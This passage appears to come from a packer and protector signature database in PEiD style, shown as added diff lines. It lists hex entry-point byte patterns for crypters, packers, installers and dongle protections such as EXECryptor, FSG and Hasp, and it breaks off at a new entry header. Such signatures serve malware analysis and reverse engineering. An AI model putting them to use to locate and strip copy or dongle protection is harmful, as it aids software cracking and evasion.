+signature = CC 90 90 EB 0B 01 50 51 52 53 54 61 33 61 2D 35 CA D1 07 52 D1 A1 3C
+ep_only = true
+
+[CreateInstall Stub vx.x]
+signature = 55 8B EC 81 EC 20 02 00 00 53 56 57 6A 00 FF 15 18 61 40 00 68 00 70 40 00 89 45 08 FF 15 14 61 40 00 85 C0 74 27 6A 00 A1 00 20 40 00 50 FF 15 3C 61 40 00 8B F0 6A 06 56 FF 15 38 61 40 00 6A 03 56 FF 15 38 61 40 00 E9 36 03 00 00 68 02 7F 00 00 33 F6 56 BF 00 30 00 00 FF 15 20 61 40 00 50 FF 15 2C 61 40 00 6A 04 57 68 00 FF 01 00 56 FF 15 CC 60 40 00 6A 04 A3 CC 35 40 00 57 68 00 0F 01 00 56 FF 15 CC 60 40 00 68 00 01 00 00 BE B0 3F 40 00 56 A3 C4 30 40 00 FF 75 08 FF 15 10 61 40 00
+ep_only = true
+
+[Crunch/PE]
+signature = 55 E8 ?? ?? ?? ?? 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85
+ep_only = true
+
+[Crunch/PE v1.0.x.x]
+signature = 55 E8 ?? ?? ?? ?? 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 09 C6 85
+ep_only = true
+
+[Crunch/PE v2.0.x.x]
+signature = 55 E8 ?? ?? ?? ?? 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 55 BB ?? ?? ?? ?? 03 DD 53 64 67 FF 36 ?? ?? 64 67 89 26
+ep_only = true
+
+[Crunch/PE v3.0.x.x]
+signature = EB 10 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 5D 81 ED 18 ?? ?? ?? 8B C5 55 60 9C 2B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 74
+ep_only = true
+
+[Crunch v4.0]
+signature = EB 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 E8 00 00 00 00 5D 81 ED 18 00 00 00 8B C5 55 60 9C 2B 85 E9 06 00 00 89 85 E1 06 00 00 FF 74 24 2C E8 BB 01 00 00 0F 82 92 05 00 00 E8 F1 03 00 00 49 0F 88 86 05 00 00 68 6C D9 B2 96 33 C0 50 E8 24 03 00 00 89 85 D9 41 00 00 68 EC 49 7B 79 33 C0 50 E8 11 03 00 00 89 85 D1 41 00 00 E8 67 05 00 00 E9 56 05 00 00 51 52 53 33 C9 49 8B D1 33 C0 33 DB AC 32 C1 8A CD 8A EA 8A D6 B6 08 66 D1 EB 66 D1 D8 73 09 66 35 20 83 66 81 F3 B8 ED FE CE 75 EB 33 C8 33 D3 4F 75 D5 F7 D2 F7 D1 5B 8B C2 C1 C0 10 66 8B C1 5A 59 C3 68 03 02 00 00 E8 80 04 00 00 0F 82 A8 02 00 00 96 8B 44 24 04 0F C8 8B D0 25 0F 0F 0F 0F 33 D0 C1 C0 08 0B C2 8B D0 25 33 33 33 33 33 D0 C1 C0 04 0B C2 8B D0 25 55 55 55 55 33 D0 C1 C0 02 0B C2
+ep_only = true
+
+[CrypKey v5 - v6]
+signature = E8 ?? ?? ?? ?? 58 83 E8 05 50 5F 57 8B F7 81 EF ?? ?? ?? ?? 83 C6 39 BA ?? ?? ?? ?? 8B DF B9 0B ?? ?? ?? 8B 06
+ep_only = true
+
+[CrypWrap vx.x]
+signature = E8 B8 ?? ?? ?? E8 90 02 ?? ?? 83 F8 ?? 75 07 6A ?? E8 ?? ?? ?? ?? FF 15 49 8F 40 ?? A9 ?? ?? ?? 80 74 0E
+ep_only = true
+
+[CICompress v1.0]
+signature = 6A 04 68 00 10 00 00 FF 35 9C 14 40 00 6A 00 FF 15 38 10 40 00 A3 FC 10 40 00 97 BE 00 20 40 00 E8 71 00 00 00 3B 05 9C 14 40 00 75 61 6A 00 6A 20 6A 02 6A 00 6A 03 68 00 00 00 C0 68 94 10 40 00 FF 15 2C 10 40 00 A3 F8 10 40 00 6A 00 68 F4 10 40 00 FF 35 9C 14 40 00 FF 35 FC 10 40 00 FF 35 F8 10 40 00 FF 15 34 10 40 00 FF 35 F8 10 40 00 FF 15 30 10 40 00 68 00 40 00 00 FF 35 9C 14 40 00 FF 35 FC 10 40 00 FF 15 3C 10 40 00 6A 00 FF 15 28 10 40 00 60 33 DB 33 C9 E8 7F 00 00 00 73 0A B1 08 E8 82 00 00 00 AA EB EF E8 6E 00 00 00 73 14 B1 04 E8 71 00 00 00 3C 00 74 EB 56 8B F7 2B F0 A4 5E EB D4 33 ED E8 51 00 00 00 72 10 B1 02 E8 54 00 00 00 3C 00 74 3B 8B E8 C1 C5 08 B1 08 E8 44 00 00 00 0B C5 50 33 ED E8 2E 00 00 00 72 0C B1 02 E8 31 00 00 00 8B E8 C1 C5 08
+ep_only = true
+
+[CipherWall Self-Extrator/Decryptor (GUI) v1.5]
+signature = 90 61 BE 00 10 42 00 8D BE 00 00 FE FF C7 87 C0 20 02 00 F9 89 C7 6A 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 08 8A 06 46 83 F0 FF 74 74 89 C5 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 75 20 41 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 83 C1 02 81 FD 00 F3 FF FF 83 D1 01 8D 14 2F 83 FD FC 76 0F 8A 02 42 88 07 47 49 75 F7 E9 63 FF FF FF 90 8B 02 83 C2 04 89 07 83 C7 04 83 E9 04 77 F1 01 CF E9 4C FF FF FF 5E 89 F7 B9 52 10 00 00 8A 07 47 2C E8 3C 01 77 F7 80 3F 0E 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4
+ep_only = true
+
+[CipherWall Self-Extrator/Decryptor (Console) v1.5]
+signature = 90 61 BE 00 10 42 00 8D BE 00 00 FE FF C7 87 C0 20 02 00 0B 6E 5B 9B 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 08 8A 06 46 83 F0 FF 74 74 89 C5 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 75 20 41 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 83 C1 02 81 FD 00 F3 FF FF 83 D1 01 8D 14 2F 83 FD FC 76 0F 8A 02 42 88 07 47 49 75 F7 E9 63 FF FF FF 90 8B 02 83 C2 04 89 07 83 C7 04 83 E9 04 77 F1 01 CF E9 4C FF FF FF 5E 89 F7 B9 12 10 00 00 8A 07 47 2C E8 3C 01 77 F7 80 3F 06 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4
+ep_only = true
+
+[DAEMON Protect v0.6.7]
+signature = 60 60 9C 8C C9 32 C9 E3 0C 52 0F 01 4C 24 FE 5A 83 C2 0C 8B 1A 9D 61
+ep_only = true
+
+[DEF v1.0]
+signature = BE ?? 01 40 00 6A 05 59 80 7E 07 00 74 11 8B 46
+ep_only = true
+
+[Ding Boy's PE-lock v0.07]
+signature = 55 57 56 52 51 53 E8 00 00 00 00 5D 8B D5 81 ED 23 35 40 00
+ep_only = true
+
+[Ding Boy's PE-lock Phantasm v0.8]
+signature = 55 57 56 52 51 53 E8 00 00 00 00 5D 8B D5 81 ED 0D 39 40 00
+ep_only = true
+
+[Ding Boy's PE-lock Phantasm v1.0 / v1.1]
+signature = 55 57 56 52 51 53 66 81 C3 EB 02 EB FC 66 81 C3 EB 02 EB FC
+ep_only = true
+
+[Ding Boy's PE-lock Phantasm v1.5b3]
+signature = 9C 55 57 56 52 51 53 9C FA E8 00 00 00 00 5D 81 ED 5B 53 40 00 B0
+ep_only = true
+
+[DBPE v1.53]
+signature = 9C 55 57 56 52 51 53 9C FA E8 ?? ?? ?? ?? 5D 81 ED 5B 53 40 ?? B0 ?? E8 ?? ?? ?? ?? 5E 83 C6 11 B9 27 ?? ?? ?? 30 06 46 49 75 FA
+ep_only = true
+
+[DBPE v2.10]
+signature = 9C 6A 10 73 0B EB 02 C1 51 E8 06 ?? ?? ?? C4 11 73 F7 5B CD 83 C4 04 EB 02 99 EB FF 0C 24 71 01 E8 79 E0 7A 01 75 83 C4 04 9D EB 01 75 68 5F 20 40 ?? E8 B0 EF FF FF 72 03 73 01 75 BE
+ep_only = true
+
+[DBPE v2.10]
+signature = EB 20 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9C 55 57 56 52 51 53 9C E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? EB 58 75 73 65 72 33 32 2E 64 6C 6C ?? 4D 65 73 73 61 67 65 42 6F 78 41 ?? 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C ?? 53 6C 65 65 70 ?? 47 65 74 54 69 63 6B 43 6F 75 6E 74
+ep_only = true
+
+[DBPE v2.33]
+signature = EB 20 ?? ?? 40 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9C 55 57 56 52 51 53 9C E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 9C 6A 10 73 0B EB 02 C1 51 E8 06 ?? ?? ?? C4 11 73 F7 5B CD 83 C4 04 EB 02 99 EB FF 0C 24 71 01 E8 79 E0 7A 01 75 83
+ep_only = true
+
+[DBPE vx.xx]
+signature = EB 20 ?? ?? 40 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9C 55 57 56 52 51 53 9C E8 ?? ?? ?? ?? 5D 81 ED
+ep_only = true
+
+[DxPack 1.0]
+signature = 60 E8 ?? ?? ?? ?? 5D 8B FD 81 ED ?? ?? ?? ?? 2B B9 ?? ?? ?? ?? 81 EF ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84
+ep_only = true
+
+[EP v1.0]
+signature = 50 83 C0 17 8B F0 97 33 C0 33 C9 B1 24 AC 86 C4 AC AA 86 C4 AA E2 F6 00 B8 40 00 03 00 3C 40 D2 33 8B 66 14 50 70 8B 8D 34 02 44 8B 18 10 48 70 03 BA 0C ?? ?? ?? ?? C0 33 FE 8B 30 AC 30 D0 C1 F0 10 C2 D0 30 F0 30 C2 C1 AA 10 42 42 CA C1 E2 04 5F E9 5E B1 C0 30 ?? 68 ?? ?? F3 00 C3 AA
+ep_only = true
+
+[EP v2.0]
+signature = 6A ?? 60 E9 01 01
+ep_only = true
+
+[ExeBundle v3.0 (standard loader)]
+signature = 00 00 00 00 60 BE 00 B0 42 00 8D BE 00 60 FD FF C7 87 B0 E4 02 00 31 3C 4B DF 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB
+ep_only = true
+
+[ExeBundle v3.0 (small loader)]
+signature = 00 00 00 00 60 BE 00 F0 40 00 8D BE 00 20 FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11
+ep_only = true
+
+[Exe Shield vx.x]
+signature = 65 78 65 73 68 6C 2E 64 6C 6C C0 5D 00
+ep_only = true
+
+[Exe Shield v1.7]
+signature = EB 06 68 90 1F 06 00 C3 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90
+ep_only = true
+
+[Exe Shield v2.7]
+signature = EB 06 68 F4 86 06 00 C3 9C 60 E8 02 00 00
+ep_only = true
+
+[Exe Shield v2.7b]
+signature = EB 06 68 40 85 06 00 C3 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 00 87 DD 8B 85 E6 90 40 00 01 85 33 90 40 00 66 C7 85 30 90 40 00 90 90 01 85 DA 90 40 00 01 85 DE 90 40 00 01 85 E2 90 40 00 BB 7B 11 00 00 03 9D EA 90 40 00 03 9D E6 90 40 00 53 8B C3 8B FB 2D AC 90 40 00 89 85 AD 90 40 00 8D B5 AC 90 40 00 B9 40 04 00 00 F3 A5 8B FB C3 BD 00 00 00 00 8B F7 83 C6 54 81 C7 FF 10 00 00 56 57 57 56 FF 95 DA 90 40 00 8B C8 5E 5F 8B C1 C1 F9 02 F3 A5 03 C8 83 E1 03 F3 A4 EB 26 D0 12 5B 00 AC 12 5B 00 48 12 5B 00 00 00 40 00 00 D0 5A 00 00 10 5B 00 87 DB 87 DB 87 DB 87 DB 87 DB 87 DB 87 DB 8B 0E B5 E6 90 40 07 56 03 76 EE 0F 18 83 C6 14 12 35 97 80 8D BD 63 39 0D B9 06 86 02 07 F3 A5 6A 04 68 06 10 12 1B FF B5 51 29 EE 10 22 95
+ep_only = true
+
+[Exe Shield v2.9]
+signature = 60 E8 00 00 00 00 5D 81 ED 0B 20 40 00 B9 EB 08 00 00 8D BD 53 20 40 00 8B F7 AC ?? ?? ?? F8
+ep_only = true
+
+[EXE Stealth v1.1]
+signature = 60 E8 00 00 00 00 5D 81 ED FB 1D 40 00 B9 7B 09 00 00 8B F7 AC
+ep_only = true
+
+[EXE Stealth v2.7]
+signature = EB 00 60 EB 00 E8 00 00 00 00 5D 81 ED D3 26 40
+ep_only = true
+
+[EXE Stealth v2.71]
+signature = EB 00 60 EB 00 E8 00 00 00 00 5D 81 ED B0 27 40
+ep_only = true
+
+[EXE Stealth v2.72]
+signature = EB 00 EB 2F 53 68 61 72 65 77 61 72 65 20 2D 20
+ep_only = true
+
+[EXE Stealth v2.74 -> WebToolMaster]
+signature = EB 00 EB 17 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 60 90 E8 00 00 00 00 5D
+ep_only = true
+
+[EXE32Pack v1.36]
+signature = 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED CC 8D 40
+ep_only = true
+
+[EXE32Pack v1.37]
+signature = 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED 4C 8E 40
+ep_only = true
+
+[EXE32Pack v1.38]
+signature = 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED DC 8D 40
+ep_only = true
+
+[EXE32Pack v1.39]
+signature = 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED EC 8D 40
+ep_only = true
+
+[EXE32Pack v1.3x]
+signature = 3B ?? 74 02 81 83 55 3B ?? 74 02 81 ?? 53 3B ?? 74 01 ?? ?? ?? ?? ?? 02 81 ?? ?? E8 ?? ?? ?? ?? 3B 74 01 ?? 5D 8B D5 81 ED
+ep_only = true
+
+[EXECryptor v1.3.0.45]
+signature = E8 24 ?? ?? ?? 8B 4C 24 0C C7 01 17 ?? 01 ?? C7 81 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 14 89 41 18 80 A1
+ep_only = true
+
+[EXECryptor v1.3.0.45]
+signature = E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 14 89 41 18 80 A1
+ep_only = true
+
+[EXECryptor v1.4.0.1]
+signature = E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 B8 00 00 00 00 ?? ?? 00 31 C0 89 41 14 89 41 18 80
+ep_only = true
+
+[EXECryptor v1.5.1.x]
+signature = E8 24 ?? ?? ?? 8B 4C 24 0C C7 01 17 ?? 01 ?? C7 81 B8 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 14 89 41 18 80 A1 C1 ?? ?? ?? FE C3 31 C0 64 FF 30 64 89 20 CC C3
+ep_only = true
+
+[EXECryptor vx.x.x.x]
+signature = E8 24 ?? ?? ?? 8B 4C 24 0C C7 01 17 ?? 01 ?? C7 81 B8 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41
+ep_only = true
+
+[EXEJoiner v1.0]
+signature = 68 00 10 40 00 68 04 01 00 00 E8 39 03 00 00 05 00 10 40 C6 00 5C 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 E8
+ep_only = true
+
+[ExeSmasher vx.x]
+signature = 9C FE 03 ?? 60 BE ?? ?? 41 ?? 8D BE ?? 10 FF FF 57 83 CD FF EB 10
+ep_only = true
+
+[EZIP v1.0]
+signature = E9 19 32 00 00 E9 7C 2A 00 00 E9 19 24 00 00 E9 FF 23 00 00 E9 1E 2E 00 00 E9 88 2E 00 00 E9 2C
+ep_only = true
+
+[FSG v1.0]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B
+ep_only = true
+
+[FSG v1.1]
+signature = BB D0 01 40 ?? BF ?? 10 40 ?? BE ?? ?? ?? ?? FC B2 80 8A 06 46 88 07 47 02 D2 75 05 8A 16
+ep_only = true
+
+[FSG v1.2]
+signature = 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 ?? 00 00 00 00 00
+ep_only = true
+
+[FSG v1.3]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? ?? 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE
+ep_only = true
+
+[FSG v1.31]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 BB ?? ?? ?? ?? B2 80 A4 B6 80 FF D3 73 F9 33 C9
+ep_only = true
+
+[FSG v1.33]
+signature = BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73
+ep_only = true
+
+[Feokt]
+signature = 89 25 A8 11 40 00 BF ?? ?? ?? 00 31 C0 B9 ?? ?? ?? 00 29 F9 FC F3 AA ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? 00 00 BE ?? ?? 40 00 BF
+ep_only = true
+
+[FixupPak v1.20]
+signature = 55 E8 00 00 00 00 5D 81 ED ?? ?? 00 00 BE 00 ?? 00 00 03 F5 BA 00 00 ?? ?? 2B D5 8B DD 33 C0 AC 3C 00 74 3D 3C 01 74 0E 3C 02 74 0E 3C 03 74 0D 03 D8 29 13 EB E7 66 AD EB F6 AD EB F3 AC 0F B6 C8 3C 00 74 06 3C 01 74 09 EB 0A 66 AD 0F B7 C8 EB 03 AD 8B C8 AC 0F B6 C0 03 D8 29 13 E2 FA EB BC 8D 85 ?? ?? 00 00 5D FF E0 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[Gleam v1.00]
+signature =  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 83 EC 0C 53 56 57 E8 24 02 00
+ep_only = true
+
+[Guardant Stealth aka Novex Dongle]
+signature = 55 8B EC 83 C4 F0 60 E8 51 FF FF FF
+ep_only = true
+
+[Hasp dongle (Alladin)]
+signature = 50 53 51 52 57 56 8B 75 1C 8B 3E ?? ?? ?? ?? ?? 8B 5D 08 8A FB ?? ?? 03 5D 10 8B 45 0C 8B 4D 14 8B 55 18 80 FF 32
+ep_only = true
+
+[Hasp 4 envelope dongle (Alladin)]
+signature = 10 02 D0 51 0F 00 83
+ep_only = true
+
+[Hardlock dongle (Alladin)]
+signature = 5C 5C 2E 5C 48 41 52 44 4C 4F 43 4B 2E 56 58 44 00 00 00 00 5C 5C 2E 5C 46 45 6E 74 65 44 65 76
+ep_only = true
+
+[Inno Setup Module]
+signature = 49 6E 6E 6F 53 65 74 75 70 4C 64 72 57 69 6E 64 6F 77 00 00 53 54 41 54 49 43
+ep_only = true
+
+[Inno Setup Module]
+signature = 49 6E 6E 6F
+ep_only = true
+
+[Inno Setup Module v1.09a]
+signature = 55 8B EC 83 C4 C0 53 56 57 33 C0 89 45 F0 89 45 C4 89 45 C0 E8 A7 7F FF FF E8 FA 92 FF FF E8 F1 B3 FF FF 33 C0
+ep_only = true
+
+[Inno Setup Module v1.2.9]
+signature = 55 8B EC 83 C4 C0 53 56 57 33 C0 89 45 F0 89 45 EC 89 45 C0 E8 5B 73 FF FF E8 D6 87 FF FF E8 C5 A9 FF FF E8 E0
+ep_only = true
+
+[Install Stub 32-bit]
+signature = 55 8B EC 81 EC 14 ?? 00 00 53 56 57 6A 00 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 29
+ep_only = true
+
+[InstallShield 2000]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 C4 ?? 53 56 57
+ep_only = true
+
+[JDPack]
+signature = 60 E8 ?? ?? ?? ?? 5D 8B D5 81 ED ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? 81 EA 06 ?? ?? ?? 89 95 ?? ?? ?? ?? 83 BD 45
+ep_only = true
+
+[kryptor 3]
+signature = EB 66 87 DB
+ep_only = true
+
+[kryptor 5]
+signature = E8 03 ?? ?? ?? E9 EB 6C 58 40 FF E0
+ep_only = true
+
+[kryptor 6]
+signature = E8 03 ?? ?? ?? E9 EB 68 58 33 D2 74 02 E9 E9 40 42 75 02
+ep_only = true
+
+[kryptor 8]
+signature = EB 6A 87 DB
+ep_only = true
+
+[kryptor 9]
+signature = 60 E8 ?? ?? ?? ?? 5E B9 ?? ?? ?? ?? 2B C0 02 04 0E D3 C0 49 79 F8 41 8D 7E 2C 33 46 ?? 66 B9
+ep_only = true
+
+[Krypton v0.2]
+signature = 8B 0C 24 E9 0A 7C 01 ?? AD 42 40 BD BE 9D 7A 04
+ep_only = true
+
+[Krypton v0.3]
+signature = 8B 0C 24 E9 C0 8D 01 ?? C1 3A 6E CA 5D 7E 79 6D B3 64 5A 71 EA
+ep_only = true
+
+[Krypton v0.4]
+signature = 54 E8 ?? ?? ?? ?? 5D 8B C5 81 ED 61 34 ?? ?? 2B 85 60 37 ?? ?? 83 E8 06
+ep_only = true
+
+[Krypton v0.5]
+signature = 54 E8 ?? ?? ?? ?? 5D 8B C5 81 ED 71 44 ?? ?? 2B 85 64 60 ?? ?? EB 43 DF
+ep_only = true
+
+[KGCrypt vx.x]
+signature = E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 64 A1 30 ?? ?? ?? 84 C0 74 ?? 64 A1 20 ?? ?? ?? 0B C0 74
+ep_only = true
+
+[LameCrypt v1.0]
+signature = 60 66 9C BB ?? ?? ?? ?? 80 B3 00 10 40 00 90 4B 83 FB FF 75 F3 66 9D 61
+ep_only = true
+
+[LTC v1.3]
+signature = 54 E8 00 00 00 00 5D 8B C5 81 ED F6 73 40 00 2B 85 87 75 40 00 83 E8 06
+ep_only = true
+
+[Lockless Intro Pack]
+signature = 2C E8 ?? ?? ?? ?? 5D 8B C5 81 ED F6 73 ?? ?? 2B 85 ?? ?? ?? ?? 83 E8 06 89 85
+ep_only = true
+
+[LaunchAnywhere v4.0.0.1]
+signature = 55 89 E5 53 83 EC 48 55 B8 FF FF FF FF 50 50 68 E0 3E 42 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 68 C0 69 44 00 E8 E4 80 FF FF 59 E8 4E 29 00 00 E8 C9 0D 00 00 85 C0 75 08 6A FF E8 6E 2B 00 00 59 E8 A8 2C 00 00 E8 23 2E 00 00 FF 15 4C C2 44 00 89 C3 EB 19 3C 22 75 14 89 C0 8D 40 00 43 8A 03 84 C0 74 04 3C 22 75 F5 3C 22 75 01 43 8A 03 84 C0 74 0B 3C 20 74 07 3C 09 75 D9 EB 01 43 8A 03 84 C0 74 04 3C 20 7E F5 8D 45 B8 50 FF 15 E4 C1 44 00 8B 45 E4 25 01 00 00 00 74 06 0F B7 45 E8 EB 05 B8 0A 00 00 00 50 53 6A 00 6A 00 FF 15 08 C2 44 00 50 E8 63 15 FF FF 50 E8 EE 2A 00 00 59 8D 65 FC 5B
+ep_only = true
+
+[Microsoft CAB SFX module]
+signature = 55 8B EC 83 EC 44 56 FF 15 ?? 10 00 01 8B F0 8A 06 3C 22 75 14 8A 46 01 46 84 C0 74 04 3C 22 75 F4 80 3E 22 75 0D ?? EB 0A 3C 20
+ep_only = true
+
+[Macromedia Windows Flash Projector/Player v3.0]
+signature = 55 8B EC 83 EC 44 56 FF 15 94 13 42 00 8B F0 B1 22 8A 06 3A C1 75 13 8A 46 01 46 3A C1 74 04 84 C0 75 F4 38 0E 75 0D 46 EB 0A 3C 20 7E 06
+ep_only = true
+
+[Macromedia Windows Flash Projector/Player v4.0]
+signature = 83 EC 44 56 FF 15 24 41 43 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C
+ep_only = true
+
+[Macromedia Windows Flash Projector/Player v5.0]
+signature = 83 EC 44 56 FF 15 70 61 44 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C 3C 20 7E 08 8A 46 01 46 3C 20 7F F8 8A 06 84 C0 74 0C 3C 20 7F 08 8A 46 01 46 84 C0 75 F4 8D 44 24 04 C7 44 24 30 00 00 00 00 50 FF 15 80 61 44 00 F6 44 24 30 01 74 0B 8B 44 24 34 25 FF FF 00 00 EB 05 B8 0A 00 00 00 50 56 6A 00 6A 00 FF 15 74 61 44 00 50 E8 18 00 00 00 50 FF 15 78 61 44 00 5E 83 C4 44 C3 90 90 90 90 90 90
+ep_only = true
+
+[Macromedia Windows Flash Projector/Player v6.0]
+signature = 83 EC 44 56 FF 15 24 81 49 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C
+ep_only = true
+
+[Morphine v1.2]
